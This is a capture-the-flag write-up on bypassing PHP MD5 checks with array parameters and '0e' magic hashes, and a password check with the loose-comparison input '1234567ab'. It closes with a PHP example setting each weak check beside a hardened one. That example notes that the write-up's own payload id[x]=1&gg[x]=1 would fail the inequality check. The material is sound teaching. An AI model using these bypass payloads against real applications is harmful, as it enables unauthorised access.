MD5 bypass + PHP weak typing
Opening the challenge page shows the following source:
<?php
$flag = 'MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if (isset($_GET['gg']) && isset($_GET['id'])) {
    $id = $_GET['id'];
    $gg = $_GET['gg'];
    // strict digest comparison, but md5() of an array yields null
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if (isset($_POST['passwd'])) {
            $passwd = $_POST['passwd'];
            if (!is_numeric($passwd)) {
                // loose comparison of a string against an int
                if ($passwd == 1234567) {
                    echo 'Good Job!';
                    highlight_file('flag.php');
                    die('By Retr_0');
                } else {
                    echo "can you think twice??";
                }
            } else {
                echo 'You can not get it !';
            }
        } else {
            die('only one way to get the flag');
        }
    } else {
        echo "You are not a real hacker!";
    }
} else {
    die('Please input first');
}
// 1. bypass md5 with an array
// 2. passwd=1234567abc
Knowledge points needed for this challenge:
$a != $b
md5($a) == md5($b)
'0e1561561651561561651651…' == '0e1561651651561561651…'
// true
With the loose == operator, two strings of the form 0e<digits> are both read as numbers in scientific notation (0 times a power of ten, i.e. 0), so they compare equal. The approach, then, is to look for strings whose MD5 digest starts with 0e.
Recommended site
$a != $b
md5($a) === md5($b)
// md5( array(0=>"123") ) -> null
// so obviously null === null
With the strict === operator the digests must be identical, but md5() given an array returns null (with a warning), and null === null holds. So the approach is to construct arrays.
payload=?a[x]=a1&a[y]=a2&a[z]=a3
PHP parses this query string into the array $a:
x => "a1"
y => "a2"
z => "a3"
So the first payload is
id[x]=1&gg[x]=1
Although an error message appears, the md5 check has clearly been bypassed.
Then the second payload
passwd=1234567ab
which yields the flag:
flag{8d86dd4a-1c04-4950-a692-daba2d9b3fad}
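The two checks from the challenge, each beside a hardened version, as an added example that is not part of the original writeup; it feeds the array and passwd inputs from the writeup through both. The two arrays are given different contents (id[x]=1, gg[x]=2), because two identical arrays are === to each other and would not satisfy $id !== $gg; the "bypassed" results for the weak checks are PHP 7 behaviour, while PHP 8 throws a TypeError for md5() on an array and no longer compares '1234567ab' == 1234567 numerically.

```php
<?php
// Added example (not from the original writeup): weak checks vs hardened checks.

// Weak check 1, as in the challenge: md5() of an array is NULL on PHP 7 (with a
// warning), so NULL === NULL passes. On PHP 8 md5() throws a TypeError instead.
function weakFirstStep($id, $gg): bool {
    try {
        return @md5($id) === @md5($gg) && $id !== $gg;
    } catch (TypeError $e) {
        return false;
    }
}

// Hardened: require real strings, then compare digests byte for byte.
// hash_equals() never applies the numeric coercion that makes '0e...' == '0e...' true.
function safeFirstStep($id, $gg): bool {
    if (!is_string($id) || !is_string($gg)) {
        return false;
    }
    return hash_equals(md5($id), md5($gg)) && $id !== $gg;
}

// Weak check 2, as in the challenge: on PHP 7, '1234567ab' == 1234567 is true because
// the leading digits of the string are converted to a number before comparing.
function weakPasswd($passwd): bool {
    return !is_numeric($passwd) && $passwd == 1234567;
}

// Hardened: compare a string with a string, strictly.
function safePasswd($passwd): bool {
    return is_string($passwd) && $passwd === '1234567';
}

// Constructed inputs: what PHP builds from ?id[x]=1&gg[x]=2 and passwd=1234567ab.
$get  = ['id' => ['x' => '1'], 'gg' => ['x' => '2']];
$post = ['passwd' => '1234567ab'];

printf("weak first step : %s\n", weakFirstStep($get['id'], $get['gg']) ? 'bypassed' : 'blocked');
printf("safe first step : %s\n", safeFirstStep($get['id'], $get['gg']) ? 'bypassed' : 'blocked');
printf("weak passwd     : %s\n", weakPasswd($post['passwd']) ? 'bypassed' : 'blocked');
printf("safe passwd     : %s\n", safePasswd($post['passwd']) ? 'bypassed' : 'blocked');
```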